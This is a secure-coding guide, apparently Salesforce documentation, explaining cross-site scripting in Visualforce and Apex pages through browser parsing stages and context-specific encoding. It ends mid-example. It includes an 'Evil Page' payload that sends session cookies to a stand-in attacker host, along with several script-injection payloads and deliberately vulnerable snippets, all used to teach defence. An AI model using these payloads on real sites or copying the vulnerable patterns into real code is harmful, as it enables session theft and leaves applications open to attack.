Secure Coding Cross Site Scripting
What is it?
Cross-site scripting is a vulnerability that occurs when an attacker can insert unauthorized JavaScript, VBScript, HTML, or other active content into a web page viewed by other users. A malicious script inserted into a page in this manner can hijack the user’s session, submit unauthorized transactions as the user, steal confidential information, or simply deface the page. Cross-site scripting is one of the most serious and most common attacks against web applications today.
XSS allows malicious users to control the content and code on your site — something only you should be able to do!!
Sample vulnerability
Consider a web application with a search feature. The user sends their query as a GET parameter, and the page displays the parameter in the page:
Request: https://example.com/api/search?q=apples
Response: “You searched for apples”
<apex:page>
<!-- Vulnerable Page at https://example.com/api/search -->
<div id='greet'></div>
<script>
document.querySelector('#greet').innerHTML='You searched for <b>{!$CurrentPage.parameters.q}</b>';
</script>
</apex:page><html>
<!-- Evil Page -->
<body>
<h1>Ten Ways to Pay Down Your Mortgage</h1>
<iframe id='attack' style='visibility:hidden'>
<script>
var payload = "\x3csvg onload=\x27document.location.href=\x22http://cybervillians.com?session=\x22+document.cookie\x27\x3e";
document.querySelector('#attack').src = "https://example.com/api/search?q=" +
encodeURIComponent(payload);
</script>
</body>
</html>The user’s browser will load the iframe by requesting https://example.com/api/search?q=<svg .....>.
<html>
<!-- Response From Server -->
<div id='greet'></div>
<script>
document.querySelector('#greet').innerHTML = 'You searched for <b>\x3csvg onload=\x27document.location.href=\x22http://cybervillians.com?session=\x22+document.cookie\x27\x3e</b>';
</script>
</html><div id='greet'>
You searched for
<b>
<svg onload='document.location.href="http://cybervillians.com?session=" + document.cookie'>
</b>
</div>Once the DOM is rendered, the browser will navigate the page to cybervillians.com and will also send the user's examle.com cookies there. It will be as if example.com developers had written their page that way. However, there is essentially no limit to the payloads the attacker could have provided. Anything example.com developers can do with HTML and JavaScript, the attacker can also do.
Overview of browser parsing
Cross-site scripting occurs when browsers interpret attacker controller data as code, therefore an understanding of how browsers distinguish between data and code is required in order to develop your application securely.
User data can and often is processed by several different parsers in sequence, with different decoding and tokenization rules applied by each parser. The sample vulnerability highlights three parsing stages:
-
Three Parsing Stages and Three Attacks
The merge-field {!$CurrentPage.parameters.q} is first passed to the HTML parser as it is processing the contents of a <script> tag. In this context, the parser is looking for the closing tag: </script> to determine the extent of the script data that should be passed to the Javascript engine.<script> document.querySelector('#greet').innerHTML='You searched for <b>"{!$CurrentPage.parameters.q}"</b>'; </script>If the attacker sets the URL parameter:q=</script><script> ..attacker code here.. </script>
The HTML parser determines the original script block has ended, and an attacker controlled script block would be sent as a second script to the Javascript engine.
Next, when the script block is sent to the Javascript parser, the attacker can try to break out of the Javascript string declaration:document.querySelector('#greet').innerHTML='You searched for <b>"{!$CurrentPage.parameters.q}"</b>';For example, by setting the URL parameter to be q='; ....attacker code here..;//'
Finally, the Javascript parser invokes an innerHTML write, passing a string back to the HTML parser for DOM rendering. Here the attacker can inject another payload containing an HTML tag with a javascript event handler. Because the string passed to innerHTML is defined in a Javascript context, the control characters do not need to be < or >, but can be represented as '\x3x' and '\x3e'. These will be interpreted by the Javascript engine as brackets to be written into the DOM. This is the original sample attack.
Therefore the sample code has three different parsing stages which allow for three different attacks, triggered by the insertion of three different control characters:
- > can be used to break out of the original script block
- ' can be used to break out of the javascript string declaration
- \x3c or \u003c or < can be used to inject a new tag via innerHTML.
Other constructions have other parsing stages and potential attacks -- the list of potentially dangerous characters is dependent on the sequence of parsers applied to user data.
Rather than trying to learn all possible dangerous characters, the developer should learn to identify the sequence of browser parsing passes and apply the corresponding sequence of escaping functions. This will ensure that user data renders properly as text and cannot escape into an execution context.
-
HTML Parsing and Encoding
When an HTML document is loaded or when javascript calls an html rendering function, the string is processed by the HTML Parser.
HTML tags follow the general structure:<tagname attrib1 attrib2='attrib2val' attrib3="attrib3val">textvalue</tagname>Only attribute values and the textvalue of a node are considered data for the HTML parser. All other tokens are considered markup.
There are two main mechanisms of injecting javascript into HTML:<div>[userinput]</div> <!-- userinput = <script>alert(1)</script> --> <div>[userinput]</div> <!-- userinput = <svg onload='payload'> --> <div title='[userinput]'> <!-- userinput = ' onmouseover='payload' ' -->- Directly as a script tag or other HTML tag that supports a javascript event handler
- Breaking out of an html tag and creating another html tag that is a javascript event handler
Because of this, user input within an html context needs to be prevented from breaking out of a quoted context or from injecting html tags. This is done with HTML encoding.
HTML Encoding
In order to force a string character to be interpreted as data rather than markup, a character reference should be used. There are two common ways to denote a character reference:
- numeric character references represent the character by an ampersand (&), the pound sign (#) followed by either the decimal unicode point value, or an "x" and the hexadecimal unicode value. Finally, a semicolon (;) closes out the character reference. This allows every unicode character to be referenced.
- entity character references represent a subset of commonly used special characters by an ampersand (&) an ascii mnemonic for the character's name, and an (optional) closing semicolon.
HTML Encoding is the process of replacing characters by their character references and HTML decoding is the reverse.<html> <body> <div id="link1"> <a href="www.salesforce.com">link</a> <!-- Not interpreted as a tag but as text--> </div> <div id="link2"> <a href="www.salesforce.com">link</a> <!-- Not interpreted as an anchor tag --> </div> <div id="link3"> <a href="www.salesforce.com">link</a> <!-- link without anchor--> </div> <div id="link4"> <a href="www.salesforce.com">link</a> <!-- works fine. --> </div> </body> </html>The HTML parser generates the following DOM:<body> <div id=”link1”> <a href=”www.salesforce.com”>link </div> <div id=”link2”> <a href=”www.salesforce.com”>link </div> <div id=”link3”> <a href=”www.salesforce.com”>link</a> </div> <div id=”link4”> <a href=”www.salesforce.com”>link</a> </div> </body>which the browser renders as:<a href=”www.salesforce.com”>link <a href=”www.salesforce.com”>link link link- For link1, because the bracket is replaced by its character reference, the less than sign is treated as a string literal. The closing tag </a> is viewed as a redundant closing tag and is not rendered in the DOM at all.
- In link2, an escaped character immediately follows the opening tag, but the HTML Parser is expecting a tagname which is markup, as this is impossible the HTML parser bails on tag processing and interprets the opening tag as text. The closing tag is swallowed as in link1.
- In link3, the anchor tag is successfully parsed but as the "h" in "href" is escaped, the href is not interpreted as an attribute and the result is an anchor tag without an href, the link text appears but is not clickable.
- In link4, because a portion of an attribute value is encoded, the character references are decoded to "www.sales" in the DOM and the link is clickable, successfully navigating to www.salesforce.com
Therefore if developers html encode user data prior to HTML rendering, the data will always render as text and never as markup. In general, only a subset of characters are html encoded: those characters that can allow an attacker to inject their own tags or break out of a quoted attribute value:Common Name Symbol Decimal Numeric Hex Numeric Entity Ampersand & & & & Less than Symbol < < < < Greater than Symbol > > > > Single Quote ' '  N/A Double Quote " "  " When using unquoted attribute values or when failing to close tags other characters need to be escaped. However in this case the set of characters that would need to be escaped are browser dependent and may change with new browser versions. Developers should ensure that all HTML tags are balanced and that all attribute values are quoted. User data within an HTML context should only appear as the text content of an existing tag or within a quoted attribute value.
-
HTML Parsing Contexts
The HTML parser operates in several contexts: the most important of which are normal, raw text, and escapable raw text contexts.
PCDATA or Normal Context Parsing
For most tags the PCDATA (in HTML 4), or normal (in HTML 5) parsing context applies. In this context the HTML parser tries to balance nested tags and performs HTML decoding prior to DOM rendering.
For example, the HTML parser converts:<div id="alpha"><span class="</div>">in alpha.</span> Still in alpha</div> <div id="beta">in beta</span></div>into the following DOM:<div id="alpha"> <span class="</div>"in alpha.</span> " Still in alpha" </div> <div id="beta">in beta</div>For PC Data parsing, keep in mind that
- Because tags and attribute values are balanced, the parser will not allow a data within an attribute value to inject a new tag or close out an existing tag, as per the example above. The only way to escape a quoted attribute value is to close out the quote OR enter a CDATA context.
- All character references are decoded, and are therefore unsafe to be used as inputs into further HTML rendering contexts without applying an additional round of encoding.
Raw Text or CDATA Parsing
For <script> and <style> tags the CDATA (HTML 4) or raw text (HTML 5) context applies. In this mode, the parser searches for the closing script or style tag, and dispatches the contents of the string between these tags to the javascript or CSS parser. No HTML decoding occurs. This is because the HTML parser does not understand javascript or CSS; its parsing role is limited to determining the length of the string to pass to the JS or CSS parser.
The following code:<html> <head> <meta charset="utf-8"> <title>JS Bin</title> </head> <body> <script> console.log('in alpha</script><script>console.log("not in alpha");</script>'); </script> </body> </html>Sends two scripts to the javascript engine, resulting in:> SyntaxError: Unexpected token ILLEGAL > not in alphaAnother example:<html> <head> </head> <body> <div id='xyz' onclick='console.log("decoded")'>Click me!</div> <div id='baa'>Click me!</div> <div id='baz'>Click me!</div> <script> document.querySelector('#baa').onclick = function() { console.log("decoded"); return true; } document.querySelector('#baz').onclick = function() { console.log("Howdy!</script><script>alert(1)</script>"); return true; } </script> </body> </html>Clicking on the first div logs decoded, whereas clicking on the second logs decoded and clicking on the third div pops an alert box.
CDATA-style processing presents a number of potential pitfalls:
- Refactoring issues: If a developer first defines the event handler inline and then re-factors to register event handlers within a script tag, she will need to ensure that one fewer HTML-encode operation occurs, otherwise data will be over encoded. Similarly, a refactoring away from separate registration towards inline definition can lead to under-encoding. In both cases, the resulting page is broken, however alphanumeric characters will continue to render properly even as a "<" will be rendered as "<" or interpreted as markup in the over or under-encoding cases.
- JS string escapes: As per the example, if an attacker can inject brackets into a javascript string context, they may be able to break out of the string by breaking out of the parent script context entirely. This effectively makes brackets javascript control characters.
- Complex parsing rules with comments: The combination of html-style comment tags with <script> or <style> tags can lead to confusing or unexpected behavior. We will not detail these parsing rules here, but developers should not nest <script> tags within each other or place html comments <!-- on the same line as <script> tags.
Escapable Raw Text Parsing
For <textarea> and <title> tags, escapable raw text parsing is used. Here the parser looks for the closing <textarea> or <title> tag and does not allow the creation of any new tags. Nevertheless, character references are decoded.
In this context keep the following in mind:
- Do not assume that user data cannot break out of this context -- data can break out by closing the title or textarea tag.
- When using this context to store HTML micro templates, do not allow user input to write to this context without HTML encoding
-
Javascript Parser
A Javascript Parser tokenizes javascript code for execution by the browser's javascript engine. Javascript code can generate new HTML code (e.g. document.write() element.innerHTML=x) and can also skip the HTML Parser and update the DOM directly (e.g.document.createElement(), element.title=x, document.body.appendChild()). Javascript code can also update element styles via the CSS Object Model (CSSOM).
Javascript has several encoding formats:
- C-style backslash \ encoding of special terminal characters and string literals
- 2 byte hex encoding of the corresponding ASCII code point: \xNN
- 3 digit octal encoding of the corresponding code point \NNN
- 4 byte hex encoding of a 4 byte UTF-16 plane: \uNNNN. Surrogate pairs are handled by placing the 4 byte references next to each other \uAAAA\uBBBB
The following table shows the typical behavior of a javascript encoder:Common Name Symbol Common JS Encoding Single Quote ' \' Double Quote " \" Backslash \ \\ Carriage Return N/A \r New Line N/A \n Less than Symbol < \x3c Greater than Symbol > \x3e Javascript encoding is not nearly as powerful as HTML encoding. Object names (variables, functions, arrays) can be encoded in Javascript and still be callable, so merely encoding something does not mark it as data rather than code. Instead, Javascript encoding is used to prevent user data from breaking out of a quoted string context, by escaping the characters that would close out a string (single and double quotes, as well as new lines). Additionally, because of CDATA parsing, a closing script tag can also break out of a string (by breaking out of the enclosing script).
Note that if user controlled data is placed into a javascript context without being quoted, then nothing can prevent XSS. All user data in javascript should be quoted AND encoded.
Be aware that Javascript decoding occurs in Javascript when strings are evalued as code such as with eval, setInterval, or Function, in which case you will need to additionally JS encode user data for each implicit eval performed. Because of this it is recommended that you do not apply evals on code containing user data.
Javascript can invoke the HTML parser by means of one of built in HTML rendering methods:HTML Rendering Methods document.write document.writeln element.innerHTML element.outerHTML element.insertAdjacentHTML If you are using jquery, the following are common DOM manipulation methods that invoke the HTML parser in their implementation. c.f. Dom XSS WikiCommon jQuery HTML Rendering Methods .add() .append() .before() .after() .html() .prepend() .replaceWith() .wrap() .wrapAll() If you are using a different toolkit or higher order javascript framework, you will need to know whether the methods you call invoke the HTML decoder or not, otherwise you risk over or under-encoding data.<html> <head> <script src='/jquery.js'> </head> <body> <div id='xyz'></div> <script> //payload var payload = "<svg onload='alert(1)'>"; var html_encoded_payload = "<svg onload='alert(1)'>"; // whether it is safe to pass the payload // to a DOM modification function depends // on whether the function invokes the HTML // parser. var el = document.querySelectorAll('#xyz'); el.append = payload; //vulnerable el.append = html_encoded_payload; //safe and correct el.innerText = payload; //safe el.innerText = html_encoded_payload; //safe but double encoded // When using a libary such as jQuery // Familiarize yourself with whether methods // perform HTML rendering and encode appropriately $('#xyz').append(payload); //vulnerable $('#xyz').append(html_encoded_payload); //safe and correct $('#xyz').text(payload); //safe $('#xyz').text(html_encoded_payload); //safe but double encoded </script> </body> </html> -
URI Parser
The URI parser tokenizes URIs into the following components:scheme://login.password@address:port/path?query_string#fragmentControl characters for the URI parser are the full ascii scheme name, scheme delimiter ":", ".", "?", "/", and "#". Data for the URI parser are the two credentials, the address, path, query string and fragment content.
In those cases when, for example a path needs to contain a question mark that should not be interpreted as a control character, then URI Encoding is used: %3f. URI encoding is defined in RFC 3986 and consists of a % sign followed by the two byte hexadecimal extended ascii number.
For security encoding, be aware that browsers support multiple pseudo-schemes, the most important of which is the javascript pseudo scheme: javascript:..payload..
If the scheme or scheme delimeter (:) is URI encoded, it will not be interpreted as a scheme. Similarly, if a "/" is URI encoded, it will not be interpreted as a path delimiter. Therefore URI encoding an a string and setting it to be an href will cause the browser to interpret the entire string as a relative path with no URL parameters and no fragments.<html> <body> <a id='xyz'>Click me!</a> <script> var el = document.querySelector('#xyz'); el.href='javascript:alert(1)' //executes el.href='javascript:\x61lert(1)' //js encode 'a' in alert. executes el.href='javascript\x3aalert(1)' //js encode ':' in scheme. executes. el.href='javascript%3aalert(1)' //URI encode ':' in scheme. does not execute el.href="javascript:alert(1)"; //does not execute el.outerHTML = '\x3ca href=\x22javascript:alert(1)\x22\x3eClick me!\x3c/a\x3e'; //executes </script> </body> </html>Because URI encoding maps characters to %XX, which are not HTML, JS, or CSS control characters, we can skip any additional encodings that would need to occur after URI encoding, but we cannot skip encodings that are required before URI encoding:<html> <body> <!-- Vulnerable to XSS --> <a id='xyz'>Click me!</a> <a id='abc'>Click me!</a> <script> var xyz = document.querySelector('#xyz'); var payload = "javascript:alert(1)"; xyz.href="javascript:\x22this.element.innerHTML=\x22" + payload + "\x22"; //vulnerable </script> </body> </html>In the above, payload will be sent to a URI parser (in the href definition) and then to the HTML parser. Therefore to properly encode the payload requires both decodings: URIENCODE(HTMLENCODE(payload)).
If, for example, the payload is only HTMLENCODED, then %3c will be URI decoded into a bracket. If the payload is only URIENCODED, then a payload of "<" can be injected directly.
As URI Encoding is only defined on ASCI codes 0-255, when higher order code points need to be encoded, they are first transformed into a sequence of UTF-8 bytes and then each byte is URI Encoded.
Be aware that javascript contains three built in URI encoding and decoding functions, none of which are suitable for security encoding:
- escape(), unescape() have been deprecated because of improper UTF-8 handling.
- encodeURI() and decodeURI() are designed to allow URIs with some illegal characters to be converted to legal URIs. These functions do not encode URI control characters such as "://" or ".".
- encodeURIComponent() and decodeURIComponent() are designed to encode all URI control characters but do not encode all characters such as the single quote.
For guidance as to which functions to use, see the specific section guidance.
-
CSS Parser
CSS parsers have their own encoding format as specified in ISO 10646. CSS encoding consists of a backslash followed by up to 6 hexadecimal digits corresponding to the unicode code point. As the number of digits is variable, a trailing space is required to close out the character reference if less than 6 digits are used, and in this case the space is consumed by the CSS parser.
As with Javascript encoding, merely encoding a string does not force the CSS parser to treat it as data rather than markup -- the encoding is only useful to prevent user data from breaking out of a quoted string declaration. Unfortunately, many CSS property values are not quoted, in which case it is impossible to safely encode the value. In this case, strict use of an allowlist (which provides a list of allowed values and prevents the use of anything unlisted) is required to ensure that only the expected characters are present in the string.
There are several ways that the CSS parser can invoke the URI parser (for example by referencing an image URL or a style sheet URL), but invocation of javascript from CSS is limited to browser specific features such as moz-bindings or older browser features (such as expression or javascript pseudo-schemes). Nevertheless, as Salesforce supports these older browsers, it's critical to use an allowlist—a list of all acceptable values— on user data whenever it is passed to the CSS interpreter.
When CSS is invoked from javascript, for example with element.style="x", it is first interpreted by the javascript parser and then by the CSS parser. In such cases, javascript control characters should be escaped. If they aren't, they could be used to bypass the allowlist filter. For this reason, filtering against the allowlist should be done as close to the sink as possible.
General References
Specific Guidance
Apex and Visualforce Applications
The platform provides two main mechanisms to avoid cross site scripting: auto HTML encoding as well as built in encoding functions that can be invoked manually from VisualForce. Nevertheless in order to use these protections correctly, the developer needs to have a thorough understanding of how user controlled variables are rendered by the browser.
There is no 'easy' button with cross site scripting defenses. Developers must understand the sequence of rendering contexts into which they place user data, and encode appropriately for each context.
Built in Auto Encoding
All merge-fields are always auto HTML encoded provided they
- do not occur within a <style> or <script> tag
- do not occur within an apex tag with the escape='false' attribute
The auto HTML encoding performed is applied last (after any other VisualForce functions) and is applied regardless of whether you use any other VisualForce encoding functions. It does not matter whether the merge-field is rendered via an explicit apex tag or directly using the braces notation within HTML markup. Your application code needs to take auto-encoding into account in order to avoid double encoding or improperly encoding merge-fields.
<apex:outputText>
{!$CurrentPage.parameters.userInput} <!-- safe (auto HTML Encoded) -->
</apex:outputText><div>
{!$CurrentPage.parameters.userInput} <!--safe (auto HTML Encoded) -->
</div><script>
var x = '{!$CurrentPage.parameters.userInput}'; //vulnerable to XSS
</script><style>
.xyz {
color: #{!$CurrentPage.parameters.userInput}; //vulnerable to XSS
}
</style>The auto encoding only provides HTML Encoding of <, > and quotes within html attributes. You must perform your own Javascript and URL encoding as well as handle CSS cross site scripting issues.
<!--vulnerable to XSS -->
<div onclick = "console.log('{!$CurrentPage.parameters.userInput}')">Click me!</div>In the above code fragment, userInput is rendered with a Javascript execution context embedded with an HTML context, and so the auto-HTML encoding is insufficient. For these and other uses cases, the platform provides VisualForce encoding functions that can be chained together to provide sufficient encoding in multiple contexts.
Unsafe sObject Data Types
| Primitive Type | Restrictions on Values |
|---|---|
| url | Can contain arbitrary text. The platform will prepend the url with 'http://' if no scheme is provided. |
| picklist | Can contain arbitrary text, independent of the field definition. Picklist values are not enforced by the schema, and users can modify a picklist value to contain any text via an update call. |
| text | Can contain arbitrary text |
| textarea | Can contain arbitrary text |
| rich text field | Contains an allowlistt of HTML tags. Any other HTML characters must be HTML-encoded. The listed tags can be safely usedunencoded in an HTML rendering context but not in any other rendering context (e.g. javascript control characters are not encoded). |
Name fields can be arbitrary text, and must be considered unsafe. This also applies to global variables such usernames.
Developers are urged to program defensively. Even if a primitive type (such as an Id) cannot contain control characters, properly output encode the field type based on the rendering context. Output encoding will never result in over encoding and will make your application safe for further refactoring should the controller logic change -- for example, by pulling the Id from a URL parameter rather than from the controller.
Built in VisualForce encoding functions
The platform provides the following VisualForce encoding functions:
- JSENCODE -- performs string encoding within a Javascript String context.
- HTMLENCODE -- encodes all characters with the appropriate HTML character references so as to avoid interpretation of characters as markup.
- URLENCODE -- performs URI encoding (% style encoding) within a URL component context.
- JSINHTMLENCODE -- a convenience method that is equivalent to the composition of HTMLENCODE(JSENCODE(x))
Data may need to be encoded multiple times if it passes through multiple parsers.
JSENCODE
<script>
var x = '{!JSENCODE($CurrentPage.parameters.userInput)}'; //safe
</script>userInput='; alert(1); //
at which point the attacker's code would execute.
<!-- safe -->
<div onclick = "console.log('{!JSENCODE($CurrentPage.parameters.userInput)}')">Click me!</div>Because the parsing flow is HTML Parser -> JS Parser, the mergefield must be properly encoded as: HTMLENCODE(JSENCODE(x)). As we know that the platform will HTML auto-encode last, it is enough to explicitly invoke the inner encoding, JSENCODE.
What is the merge-field is not typed as a string? One option is to leave the merge-field naked. However this is a dangerous anti-pattern because it creates a dependency between the implementation details in the controller and the security of the visualforce page. Suppose, for example, that in the future, the controller pulls this value from a URL parameter or textfield. Now the visualforce page is vulnerable to cross site scripting. The security of the visualforce page should be decoupled as much as possible from the controller implementation.
<script>
var myint = parseInt("{!JSENCODE(int_data)}"); //now we are sure that x is an int
var myfloat = parseFloat("{!JSENCODE(float_data)}"); //now we are sure that y is a float
var mybool = {!IF(bool_data, "true", "false")}; //now we are sure that mybool is a boolean
var myJSON = JSON.parse("{!JSENCODE(stringified_value)}"); //when transmitting stringified JSON
</script>This way a subtle change in the controller implementation (for example, pulling the value from a URL parameter or text field) will not trigger a security vulnerability in the corresponding VisualForce page.
HTMLENCODE
HTMLENCODE is required when userdata is interpreted in an HTML Context and is not already auto-encoded.
<apex:outputText escape="false" value="<i>Hello {!HTMLENCODE(Account.Name)}</i>" />In the above, because Name fields can be arbitrary text strings, any rendering of this field needs to be properly output encoded. Because we want to combine markup (italics) with data, the apex tag is set to escape="false" and we manually encode user data.
<div id="xyz"></div>
<script>
document.querySelector('#xyz').innerHTML='Howdy ' + '{!JSENCODE(HTMLENCODE(Account.Name))}';
</script>In the above, the merge-field first passes through the HTML Parser when the page is loaded, but because the merge-field is within a script tag, the HTML parser does not perform character reference substitution and instead passes the contents of the script block to the javascript parser. Javascript code then calls innerHTML which performs HTML parsing (and character reference substitution). Therefore the parsing is Javascript -> HTML, and the necessary encoding is JSENCODE(HTMLENCODE()). Note that only performing JSENCODE or only performing HTMLENCODE will lead to a broken page and possibly a cross site scripting vulnerability.
<!-- vulnerable to XSS -->
<div onclick="this.innerHTML='Howdy {!Account.Name}'">Click me!</div><!-- safe -->
<div onclick="this.innerHTML='Howdy {!JSENCODE(HTMLENCODE(Account.Name))}'">Click me!</div><!-- vulnerable to XSS -->
<div onclick="this.innerHTML='\x3cdiv onclick=\x22console.log(\x27Howdy {!Account.Name}\x27);\x22\x3eClick me again!\x3c/div\x3e'">Click me!</div><!-- safe -->
<div onclick="this.innerHTML='\x3cdiv onclick=\x22console.log(\x27Howdy {!JSENCODE(HTMLENCODE(JSENCODE(Account.Name)))}\x27);\x22\x3eClick me again!\x3c/div\x3e'">Click me!</div>URLENCODE
<!-- Safe -->
<img src="/xyz?name={!URLENCODE(Pic.name)}">{!Pic.Name}</img><script>
<!-- Safe, but anti-pattern -->
var x = '{!URLENCODE(Pic.name)}';
var el = document.querySelector('#xyz');
el.outerHTML = '<img src = "/pics?name=' + x + '">';
</script><script>
<!-- Safe, and no use of HTML rendering -->
var x = '{!URLENCODE(Pic.name)}';
var el = document.querySelector('#xyz');
el.src = '/pics?name=' + x;
</script>One thing to keep in mind about URLs is that all browsers will accept a javascript pseudo-scheme for location URLs while older browsers will also accept a javascript pseudo-scheme for src attributes or url attributes within CSS. Therefore you must control the scheme as well as the host and only allow user input to set URL parameters or paths. In those cases when users select the host, you must create an allowlistof acceptable hosts and validate against it to avoid arbitrary redirect vulnerabilities.
JSINHTMLENCODE
<!-- safe, but broken due to double html encoding -->
<div onclick="console.log('{!JSINHTMLENCODE(Account.Name)}')">Click me!</div><!-- safe and accurate -->
<div onclick="console.log('{!JSENCODE(Account.Name)}')">Click me!</div><script>
var el = document.querySelector('#xyz');
el.innerHTML = "Howdy {!JSINHTMLENCODE(Account.Name)}"; //safe and accurate
</script>XSS in CSS
<style>
<!-- vulnerable to XSS unless verified with an allowlist in the controller-->
foo {
color: #{!color};
}
<style><script>
var el = document.querySelector('#xyz');
var color = '{!JSENCODE(color)}'; //must JSENCODE to prevent breakint out of string
if ( /(^[0-9a-f]{6}$)|(^[0-9a-f]{3}$)/i.test(color) ) {
el.style.color='#' + color; //safe to render into a style context
}
<script>Client-side encoding and API interfaces
Many applications pull data via API callouts executed in javascript, and then render the data in the DOM with javascript or a javascript-based toolkit. In this case, the VisualForce encoding functions cannot be used to properly encode data, nevertheless the data must still be encoded for the appropriate rendering context. Note that no auto-html encoding is done by the platform when the DOM is rendered client-side, so a simple re-factoring from server-side rendering with VisualForce merge-fields to client-side rendering with javascript may create multiple XSS vulnerabilities.
//vulnerable code
cometd.subscribe('/topic/xyz', function(message) {
var data = document.createElement('li');
data.innerHTML = JSON.stringify(message.data.sobject.xyz__c);
document.querySelector('#content').appendChild(data);
});Here if xyz__c is built from one of the dangerous sObject types such as text, passing it to an html rendering function creates a vulnerability. In this case, the developer has two options:
- Use a safe DOM manipulation function such as innerText, rather than innerHTML.
- Properly encode the data in javascript prior to the innerHTML write
The first option is preferred, but may sometimes be impractical (for example when you are using a higher level toolkit that performs innerHTML writes in the method you are using.) In this case you must use a javascript encoding library.
Javascript Security Encoding Libraries
Although Salesforce does not currently export javascript security encoding methods, there are a number of third party security libraries that you can use.
<apex:page controller="Xyz">
<apex:includeScript value="{!$Resource.SecureFilters}"/>
<div id="result">result</div>
<script type="text/javascript">
//basic encoding functions
var html_encode = secureFilters.html;
var js_encode = secureFilters.js;
var uri_encode = secureFilters.uri;
var css_encode = secureFilter.css;
//
//convenience methods
//
// applies HTMLENCODE(CSS ENCODE)
var style_encode = secureFilters.style;
// applies HTMLENCODE(JS ENCODE) for use in js event handlers
// defined in HTML rendering.
var js_attr_encode = secureFilters.jsAttr;
// secure version of JSON.stringify
var obj_encode = secureFilters.jsObj;
//Example usage
Visualforce.remoting.Manager.invokeAction(
'{!$RemoteAction.Xyz.getName}',
function(result, event){
if (event.status) {
//requires html encoding
$("#xyz").append(html_encode(result));
$("#xyz").append(
//requires html(js(encoding))
"<div id='abc'" + onclick='console.log('" +
js_attr_encode(result) + "');>Click me</div>"
);
$("#abc").onmouseover = function() {
//do not encode here
console.log('You moused over ' + result);
};
} else if (event.type === 'exception') {
$("#responseErrors").html(
//'pre' is not safe because the message can contain
// a closing '</pre>' tag
event.message + "<br/>\n<pre>" + html_encode(event.where) + "</pre>"
);
} else {
//don't forget to encode messages in error conditions!
$("#responseErrors").html(
html_encode(event.message)
);
}
},
{escape: false}
);
</script>
</apex:page>Notice that when generating the logs, in one case the sample code applied html(js(result)) encoding needs to be applied while in another, no encoding needs to be applied even though the code is trying to do the same thing: create an event handler that logs a user controlled string to the console.
This is because in the first case, user data is serialized into a string which is passed to the HTML parser, which, when parsed includes an attribute value definition -- serialized into another string -- that is passed to the JS parser. Therefore two layers of encoding are needed.
In the second case, the event handler was defined directly in javascript as a function and assigned to a DOM property. Because no string serialization or de-serialization occured, no client-side encoding was required.
Avoiding Serialization
<script>
var payload = '{!JSENCODE($CurrentPage.parameters.xyz)}';
//bad practice and vulnerable
$("#xyz").append("<div>" + payload + "</div>");
//safe and good practice
$("#xyz").append(
document.createElement('div').innerText = payload
);
//bad practice and vulnerable
$("a#xyz").html("<a href=/" + payload + ">" + document.location.host + "/" + payload + "</a>");
//safe and good practice
$("a#xyz").href = document.location.host + "/" + payload;
$("a#xyz").innerText = payload;
//bad practice and vulnerable
$("#xyz").append("<div id='abc' onclick='console.log("" + payload + "");' >");
//safe and good practice
var el = document.createElement('div');
el.setAttribute('id', 'abc');
el.onclick = function() { console.log(payload); };
$("#xyz").append(el);
</script>Built-in API encodings
Javascript remoting can be invoked with {escape: false} or (the default) {escape: true}. Enabling escaping means that the response is html encoded. In general developers should use {escape: true} when possible, but there are many cases where global html encoding at the transport layer is inappropriate.
- Encoding at the transport layer means that every field is html encoded, even if some fields (e.g. rich text fields) should not be encoded.
- In some cases, built in encoding is not available at the transport layer.
However, the advantage of html encoding at the transport layer is that if your page design is very simple (so that you only need html encoding), then you will not need to import a client side encoding library.
| API | Transport Layer Encoding Policy |
|---|---|
| SOAP API/REST API | never encodes |
| Streaming API | never encodes |
| Ajax Toolkit | never encodes |
| Javascript Remoting | HTML encoding unless explicit {escape:’false’} |
| Visualforce Object Remoting | always HTML encodes |
<script>
var client = new forcetk.Client();
client.setSessionToken('{!$Api.Session_ID}');
client.query("SELECT Name FROM Account LIMIT 1", function(response){
$j('#accountname').html(response.records[0].Name); //vulnerable to XSS
});
</script>Other taint sources
<apex:page>
<apex:includeScript value="{!$Resource.SecureFilters}"/>
<!-- safe, because of auto html-encoding -->
<h1 id="heading">{!$CurrentPage.parameters.heading}</h1>
<div id="section1"></div>
<div id="section2"></div>
<div id="section3"></div>
<script>
//safe because no HTML rendering occurs
document.querySelector('#section1').innertext =
document.querySelector('#heading').innerText;
//safe even though HTML rendering occurs because
//data is HTML encoded.
document.querySelector('#section2').innerHTML =
secureFilters.html(document.querySelector('#section1').innerText);
//vulnerable to XSS. HTML rendering is used and no encoding is performed.
document.querySelector('#section3').innerHTML =
document.querySelector('#section2').innerText;
</script>
</apex:page>The Dom XSS Wiki contains a detailed list of sinks, sources and sample code.
Javascript Micro Templates
Developers wanting to move more presentational logic to the client often make use of javascript templating languages to handle html generation.
There are a large number of javascript micro-templating frameworks, roughly falling into two categories:
- logic-less frameworks such as mustache.js have their own domain specific language for iteration and and logical operations.
- embedded javascript frameworks such as underscore_js’s _template function use javascript to perform iteration and logical operations with client-side merge-fields, obviating the need to learn a DSL.
Nevertheless, none of the encoding or security concerns go away with these frameworks -- developers still need to be mindful of the type of data that is passed into the framework and the ultimate context in which the data will be rendered in order to properly output encode all variables, but additionally they need to study the built in encoding options offered by the framework. Generally all frameworks have support for some kind of html encoding, but the developer should verify that this includes escaping of single and double quotes for rendering within html attributes.
For rendering URLs, Javascript, or CSS, the developer is on their own and must either not render user-data in these contexts or use a third party security library to properly escape output in all contexts other than pure html.
One concern to keep in mind is that sometimes template data is stored in textarea tags with visibility set to hidden. In this case, be aware that HTML rendering occurs when data is sent to a textarea field.
Finally, never place merge-fields into template data, as templates are invoked with eval(). Rather, define use merge-fields to define variables outside of your template and then pass the variable reference to the template.
Underscore Templates
<apex:page >
<!-- vulnerable code -->
<apex:IncludeScript value="{!$Resource.jquery}"/>
<apex:IncludeScript value="{!$Resource.underscore}"/>
<apex:IncludeScript value="{!$Resource.Securefilters}"/>
<apex:includeScript value="{!URLFOR($Resource.forcetk')}"/>
<div id='mainContainer'>content</div>
<!-- vulnerable to XSS -->
<script type='template' id="template1">
<div onclick="console.log('<%- Name %>');"><%-Id%></div>
</script>
<!-- safe -->
<script type='template' id="template2">
<div onclick='console.log("<% print(jsencode(Name)) %>")'><%-Id%></div>
</script>
<!-- vulnerable to XSS -->
<script type='template' id="template3">
<div>Name: <%=Name%></div>
</script>
<!-- safe -->
<script type='template' id="template3">
<div>Name: <%-Name%></div>
</script>
<script>
var compiled1 = _.template($('#template1').html());
var compiled2 = _.template($('#template2').html());
var compiled3 = _.template($('#template3').html());
var compiled4 = _.template($('#template4').html());
var client = new forcetk.Client();
client.setSessionToken('{!$Api.Session_ID}');
var jsencode = secureFilters.js;
$(document).ready(function() {
